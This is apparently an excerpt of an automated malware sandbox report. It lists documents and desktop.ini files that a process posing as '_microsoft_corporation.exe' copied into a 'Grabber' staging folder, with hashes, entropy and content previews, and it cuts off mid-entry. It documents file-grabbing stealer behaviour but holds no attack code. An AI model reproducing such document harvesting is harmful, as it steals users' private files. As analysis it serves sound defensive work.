C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\KZWFNRXYKI.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\WUTJSCBCFX.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\ZBEDCJPBEY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
